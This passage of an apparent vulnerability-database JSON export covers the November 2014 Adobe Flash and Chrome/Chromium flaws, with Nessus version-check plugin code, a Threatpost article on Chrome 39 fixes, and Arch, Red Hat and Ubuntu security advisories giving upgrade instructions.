CVE-2014-8438)\n\n - A double free vulnerability that could lead to code\n execution. (CVE-2014-0574)\n\n - Type confusion vulnerabilities that could lead to code\n execution. (CVE-2014-0577 / CVE-2014-0584 /\n CVE-2014-0585 / CVE-2014-0586 / CVE-2014-0590)\n\n - Heap buffer overflow vulnerabilities that could lead to\n code execution. (CVE-2014-0582 / CVE-2014-0589)\n\n - An information disclosure vulnerability that could be\n exploited to disclose session tokens. (CVE-2014-8437)\n\n - A heap buffer overflow vulnerability that could be\n exploited to perform privilege escalation from low to\n medium integrity level. (CVE-2014-0583)\n\n - A permission issue that could be exploited to perform\n privilege escalation from low to medium integrity level\n (CVE-2014-8442). Further information can be found at\n http://helpx.adobe.com/security/products/flash-player/ap\n sb14-24.html .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=905032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0573.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0574.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0576.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0577.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0581.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0582.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0583.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0584.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0585.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0586.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0588.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0589.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0590.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8437.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8438.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8440.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8441.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8442.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9958.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.418-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.418-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:21:28", "description": "The version of Google Chrome installed on the remote Windows host is a\nversion prior to 38.0.2125.122. It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption vulnerabilities allow an\n attacker to execute arbitrary code. (CVE-2014-0576,\n CVE-2014-0581, CVE-2014-8440, CVE-2014-8441)\n\n - Multiple use-after-free vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0573, CVE-2014-0588,\n CVE-2014-8438, CVE-2014-0574)\n\n - Multiple type confusion vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0577, CVE-2014-0584,\n CVE-2014-0585, CVE-2014-0586, CVE-2014-0590)\n\n - Multiple heap-based buffer overflow vulnerabilities can\n be exploited to execute arbitrary code or elevate\n privileges. (CVE-2014-0583, CVE-2014-0582,\n CVE-2014-0589)\n\n - A permission issue that allows a remote attacker to gain\n elevated privileges. (CVE-2014-8442)\n\n - An information disclosure vulnerability can be exploited\n to disclose secret session tokens. (CVE-2014-8437)", "edition": 27, "published": "2014-11-12T00:00:00", "title": "Google Chrome < 38.0.2125.122 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_38_0_2125_122.NASL", "href": "https://www.tenable.com/plugins/nessus/79141", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79141);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0573\",\n \"CVE-2014-0574\",\n \"CVE-2014-0576\",\n \"CVE-2014-0577\",\n \"CVE-2014-0581\",\n \"CVE-2014-0582\",\n \"CVE-2014-0583\",\n \"CVE-2014-0584\",\n \"CVE-2014-0585\",\n \"CVE-2014-0586\",\n \"CVE-2014-0588\",\n \"CVE-2014-0589\",\n \"CVE-2014-0590\",\n \"CVE-2014-8437\",\n \"CVE-2014-8438\",\n \"CVE-2014-8440\",\n \"CVE-2014-8441\",\n \"CVE-2014-8442\"\n );\n script_bugtraq_id(\n 71033,\n 71035,\n 71036,\n 71037,\n 71038,\n 71039,\n 71040,\n 71041,\n 71042,\n 71043,\n 71044,\n 71045,\n 71046,\n 71047,\n 71048,\n 71049,\n 71050,\n 71051\n );\n\n script_name(english:\"Google Chrome < 38.0.2125.122 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is a\nversion prior to 38.0.2125.122. It is, therefore, affected by the\nfollowing vulnerabilities due to the version of Adobe Flash bundled\nwith the application :\n\n - Multiple memory corruption vulnerabilities allow an\n attacker to execute arbitrary code. (CVE-2014-0576,\n CVE-2014-0581, CVE-2014-8440, CVE-2014-8441)\n\n - Multiple use-after-free vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0573, CVE-2014-0588,\n CVE-2014-8438, CVE-2014-0574)\n\n - Multiple type confusion vulnerabilities could result in\n arbitrary code execution. (CVE-2014-0577, CVE-2014-0584,\n CVE-2014-0585, CVE-2014-0586, CVE-2014-0590)\n\n - Multiple heap-based buffer overflow vulnerabilities can\n be exploited to execute arbitrary code or elevate\n privileges. (CVE-2014-0583, CVE-2014-0582,\n CVE-2014-0589)\n\n - A permission issue that allows a remote attacker to gain\n elevated privileges. (CVE-2014-8442)\n\n - An information disclosure vulnerability can be exploited\n to disclose secret session tokens. (CVE-2014-8437)\");\n # http://googlechromereleases.blogspot.com/2014/11/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb7317d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 38.0.2125.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8441\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'38.0.2125.122', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:50", "bulletinFamily": "info", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7900", "CVE-2014-7901", "CVE-2014-7902", "CVE-2014-7903", "CVE-2014-7904", "CVE-2014-7905", "CVE-2014-7906", "CVE-2014-7907", "CVE-2014-7908", "CVE-2014-7909"], "description": "Google has released Chrome 39, fixing 42 security vulnerabilities and removing support for the fallback to SSLv3, the component that was the target of the [POODLE attack](<https://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) revealed last month.\n\nWhen the POODLE attack was disclosed by several Google researchers in October, the company said that it had added a change to Chrome that would disable SSLv3 fallback. The technique involves an attacker to force a server to fall back from a modern version of SSL/TLS to the older SSLv3 and then decrypt the protected traffic by sending a high volume of requests to the server. The company plans to disable support for SSLv3 altogether at some point in the near future.\n\nA little further down the line, perhaps in about three months, we hope to disable SSLv3 completely. The changes that I\u2019ve just landed in Chrome only disable fallback to SSLv3 \u2013 a server that correctly negotiates SSLv3 can still use it. Disabling SSLv3 completely will break even more than just disabling the fallback but SSLv3 is now completely broken with CBC-mode ciphers and the only other option is RC4, which is hardly that attractive. Any servers depending on SSLv3 are thus on notice that they need to address that now,\u201d Adam Langley of Google [wrote](<https://www.imperialviolet.org/2014/10/14/poodle.html>) in October.\n\nAmong the fixes in [Chrome 39](<http://googlechromereleases.blogspot.com/2014/11/stable-channel-update_18.html>) are a number of patches for high-risk vulnerabilities, including several buffer overflows, use-after-frees and integer overflows. Google paid out $25,000 in rewards to researchers who reported vulnerabilities fixed in the new release. In addition, the company paid out $16,500 in additional rewards to researchers who found bugs during the development cycle.\n\nThe full list of patches in Chrome 39:\n\n[$500][[389734](<https://code.google.com/p/chromium/issues/detail?id=389734>)] High CVE-2014-7899: Address bar spoofing. _Credit to _[_Eli Grey_](<http://eligrey.com/>)_._\n\n[$1500][[406868](<https://code.google.com/p/chromium/issues/detail?id=406868>)] High CVE-2014-7900: Use-after-free in pdfium. _Credit to Atte Kettunen from OUSPG._\n\n[$1000][[413375](<https://code.google.com/p/chromium/issues/detail?id=413375>)] High CVE-2014-7901: Integer overflow in pdfium. _Credit to cloudfuzzer._\n\n[$1000][[414504](<https://code.google.com/p/chromium/issues/detail?id=414504>)] High CVE-2014-7902: Use-after-free in pdfium. _Credit to cloudfuzzer._\n\n[$3000][[414525](<https://code.google.com/p/chromium/issues/detail?id=414525>)] High CVE-2014-7903: Buffer overflow in pdfium. _Credit to cloudfuzzer._\n\n[$2000][[418161](<https://code.google.com/p/chromium/issues/detail?id=418161>)] High CVE-2014-7904: Buffer overflow in Skia. _Credit to Atte Kettunen from OUSPG._\n\n[$2000][[421817](<https://code.google.com/p/chromium/issues/detail?id=421817>)] High CVE-2014-7905: Flaw allowing navigation to intents that do not have the BROWSABLE category. _Credit to WangTao(neobyte) of Baidu X-Team._\n\n[$500][[423030](<https://code.google.com/p/chromium/issues/detail?id=423030>)] High CVE-2014-7906: Use-after-free in pepper plugins. _Credit to Chen Zhang (demi6od) of the NSFOCUS Security Team._\n\n[$7500][[423703](<https://code.google.com/p/chromium/issues/detail?id=423703>)] High CVE-2014-0574: Double-free in Flash. _Credit to_ _biloulehibou._\n\n[$5000][[424453](<https://code.google.com/p/chromium/issues/detail?id=424453>)] High CVE-2014-7907: Use-after-free in blink. _Credit to Chen Zhang (demi6od) of the NSFOCUS Security Team._\n\n[$500][[425980](<https://code.google.com/p/chromium/issues/detail?id=425980>)] High CVE-2014-7908: Integer overflow in media. _Credit to Christoph Diehl._\n\n[$500][[391001](<https://code.google.com/p/chromium/issues/detail?id=391001>)] Medium CVE-2014-7909: Uninitialized memory read in Skia. _Credit to miaubiz._\n", "modified": "2014-11-24T18:40:37", "published": "2014-11-18T13:42:18", "id": "THREATPOST:DCCF6E08CBB78DDE988D0C3CB0E04C1A", "href": "https://threatpost.com/google-removes-sslv3-fallback-support-from-chrome/109455/", "type": "threatpost", "title": "Google Removes SSLv3 Fallback Support From Chrome", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "- CVE-2014-7899 (address bar spoofing)\nA flaw allows remote attackers to spoof the address bar by placing a\nblob: substring at the beginning of the URL, followed by the original\nURI scheme and a long username string.\n\n- CVE-2014-7900 (use-after-free)\nUse-after-free vulnerability in the CPDF_Parser::IsLinearizedFile\nfunction in fpdfapi/fpdf_parser/fpdf_parser_parser.cpp in PDFium allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a crafted PDF document.\n\n- CVE-2014-7901 (integer overflow)\nInteger overflow in the opj_t2_read_packet_data function in\nfxcodec/fx_libopenjpeg/libopenjpeg20/t2.c in OpenJPEG in PDFium allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a long segment in a JPEG image.\n\n- CVE-2014-7902 (use-after-free)\nUse-after-free vulnerability in PDFium allows remote attackers to cause\na denial of service or possibly have unspecified other impact via a\ncrafted PDF document.\n\n- CVE-2014-7903 (buffer overflow)\nBuffer overflow in OpenJPEG before r2911 in PDFium allows remote\nattackers to cause a denial of service or possibly have unspecified\nother impact via a crafted JPEG image.\n\n- CVE-2014-7904 (buffer overflow)\nBuffer overflow in Skia allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via unknown vectors.\n\n- CVE-2014-7906 (use-after-free)\nUse-after-free vulnerability in the Pepper plugins allows remote\nattackers to cause a denial of service or possibly have unspecified\nother impact via crafted Flash content that triggers an attempted\nPepperMediaDeviceManager access outside of the object's lifetime.\n\n- CVE-2014-7907 (use-after-free)\nMultiple use-after-free vulnerabilities in\nmodules/screen_orientation/ScreenOrientationController.cpp in Blink\nallow remote attackers to cause a denial of service or possibly have\nunspecified other impact via vectors that trigger improper handling of a\ndetached frame, related to the (1) lock and (2) unlock methods.\n\n- CVE-2014-7908 (integer overflow)\nMultiple integer overflows in the CheckMov function in\nmedia/base/container_names.cc allow remote attackers to cause a denial\nof service or possibly have unspecified other impact via a large atom in\n(1) MPEG-4 or (2) QuickTime .mov data.\n\n- CVE-2014-7909 (uninitialized memory read)\nA flaw in effects/SkDashPathEffect.cpp in Skia computes a hash key using\nuninitialized integer values, which might allow remote attackers to\ncause a denial of service by rendering crafted data.\n\n- CVE-2014-7910 (various issues)\nVarious issues from internal audits, fuzzing and other initiatives that\nallow attackers to cause a denial of service or possibly have other impact.", "modified": "2014-11-20T00:00:00", "published": "2014-11-20T00:00:00", "id": "ASA-201411-26", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-November/000151.html", "type": "archlinux", "title": "chromium: multiple issues", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "These updates resolve memory corruption vulnerabilities that could lead\nto code execution (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440,\nCVE-2014-8441).\n\nThese updates resolve use-after-free vulnerabilities that could lead to\ncode execution (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n\nThese updates resolve a double free vulnerability that could lead to\ncode execution (CVE-2014-0574).\n\nThese updates resolve type confusion vulnerabilities that could lead to\ncode execution (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585,\nCVE-2014-0586, CVE-2014-0590).\n\nThese updates resolve heap buffer overflow vulnerabilities that could\nlead to code execution (CVE-2014-0582, CVE-2014-0589).\n\nThese updates resolve an information disclosure vulnerability that could\nbe exploited to disclose session tokens (CVE-2014-8437).\n\nThese updates resolve a heap buffer overflow vulnerability that could be\nexploited to perform privilege escalation from low to medium integrity\nlevel (CVE-2014-0583).\n\nThese updates resolve a permission issue that could be exploited to\nperform privilege escalation from low to medium integrity level\n(CVE-2014-8442).", "modified": "2014-11-13T00:00:00", "published": "2014-11-13T00:00:00", "id": "ASA-201411-11", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-November/000136.html", "type": "archlinux", "title": "flashplugin: remote code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7899", "CVE-2014-7904", "CVE-2014-7906", "CVE-2014-7907", "CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7910"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium. (CVE-2014-7904, CVE-2014-7906, CVE-2014-7907, CVE-2014-7910, \nCVE-2014-7908, CVE-2014-7909)\n\nA flaw was found in the way Chromium parsed certain URL values. A malicious\nattacker could use this flaw to perform phishing attacks. (CVE-2014-7899)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 39.0.2171.65, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take\neffect.\n", "modified": "2018-06-07T09:04:30", "published": "2014-11-24T05:00:00", "id": "RHSA-2014:1894", "href": "https://access.redhat.com/errata/RHSA-2014:1894", "type": "redhat", "title": "(RHSA-2014:1894) Important: chromium-browser security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:18", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0573", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0577", "CVE-2014-0581", "CVE-2014-0582", "CVE-2014-0584", "CVE-2014-0585", "CVE-2014-0586", "CVE-2014-0588", "CVE-2014-0589", "CVE-2014-0590", "CVE-2014-8437", "CVE-2014-8438", "CVE-2014-8440", "CVE-2014-8441"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB14-24,\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2014-0573, CVE-2014-0574, CVE-2014-0576, CVE-2014-0577,\nCVE-2014-0581, CVE-2014-0582, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\nCVE-2014-0588, CVE-2014-0589, CVE-2014-0590, CVE-2014-8438, CVE-2014-8440,\nCVE-2014-8441)\n\nThis update also fixes an information disclosure flaw in flash-plugin that\ncould allow a remote attacker to obtain a victim's session cookie.\n(CVE-2014-8437)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.418.\n", "modified": "2018-06-07T09:04:20", "published": "2014-11-13T05:00:00", "id": "RHSA-2014:1852", "href": "https://access.redhat.com/errata/RHSA-2014:1852", "type": "redhat", "title": "(RHSA-2014:1852) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:40:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "A buffer overflow was discovered in Skia. If a user were tricked in to \nopening a specially crafted website, an attacked could potentially exploit \nthis to cause a denial of service via renderer crash or execute arbitrary \ncode with the privileges of the sandboxed render process. (CVE-2014-7904)\n\nMultiple use-after-frees were discovered in Blink. If a user were tricked \nin to opening a specially crafted website, an attacked could potentially \nexploit these to cause a denial of service via renderer crash or execute \narbitrary code with the privileges of the sandboxed render process. \n(CVE-2014-7907)\n\nAn integer overflow was discovered in media. If a user were tricked in to \nopening a specially crafted website, an attacked could potentially exploit \nthis to cause a denial of service via renderer crash or execute arbitrary \ncode with the privileges of the sandboxed render process. (CVE-2014-7908)\n\nAn uninitialized memory read was discovered in Skia. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to cause a denial of service via renderer crash. \n(CVE-2014-7909)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial of \nservice via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2014-7910)", "edition": 5, "modified": "2014-11-19T00:00:00", "published": "2014-11-19T00:00:00", "id": "USN-2410-1", "href": "https://ubuntu.com/security/notices/USN-2410-1", "title": "Oxide vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "Multiple memory corruptions.", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14118", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14118", "title": "Oxide multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-7908", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2410-1\r\nNovember 19, 2014\r\n\r\noxide-qt vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in Oxide.\r\n\r\nSoftware Description:\r\n- oxide-qt: Web browser engine library for Qt &#40;QML plugin&#41;\r\n\r\nDetails:\r\n\r\nA buffer overflow was discovered in Skia. If a user were tricked in to\r\nopening a specially crafted website, an attacked could potentially exploit\r\nthis to cause a denial of service via renderer crash or execute arbitrary\r\ncode with the privileges of the sandboxed render process. &#40;CVE-2014-7904&#41;\r\n\r\nMultiple use-after-frees were discovered in Blink. If a user were tricked\r\nin to opening a specially crafted website, an attacked could potentially\r\nexploit these to cause a denial of service via renderer crash or execute\r\narbitrary code with the privileges of the sandboxed render process.\r\n&#40;CVE-2014-7907&#41;\r\n\r\nAn integer overflow was discovered in media. If a user were tricked in to\r\nopening a specially crafted website, an attacked could potentially exploit\r\nthis to cause a denial of service via renderer crash or execute arbitrary\r\ncode with the privileges of the sandboxed render process. &#40;CVE-2014-7908&#41;\r\n\r\nAn uninitialized memory read was discovered in Skia. If a user were\r\ntricked in to opening a specially crafted website, an attacker could\r\npotentially exploit this to cause a denial of service via renderer crash.\r\n&#40;CVE-2014-7909&#41;\r\n\r\nMultiple security issues were discovered in Chromium. If a user were\r\ntricked in to opening a specially crafted website, an attacker could\r\npotentially exploit these to read uninitialized memory, cause a denial of\r\nservice via application crash or execute arbitrary code with the\r\nprivileges of the user invoking the program. &#40;CVE-2014-7910&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.10:\r\n liboxideqtcore0 1.3.4-0ubuntu0.14.10.1\r\n oxideqt-codecs 1.3.4-0ubuntu0.14.10.1\r\n oxideqt-codecs-extra 1.3.4-0ubuntu0.14.10.1\r\n\r\nUbuntu 14.04 LTS:\r\n liboxideqtcore0 1.3.4-0ubuntu0.14.04.1\r\n oxideqt-codecs 1.3.4-0ubuntu0.14.04.1\r\n oxideqt-codecs-extra 1.3.4-0ubuntu0.14.04.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2410-1\r\n CVE-2014-7904, CVE-2014-7907, CVE-2014-7908, CVE-2014-7909,\r\n CVE-2014-7910\r\n\r\nPackage Information:\r\n 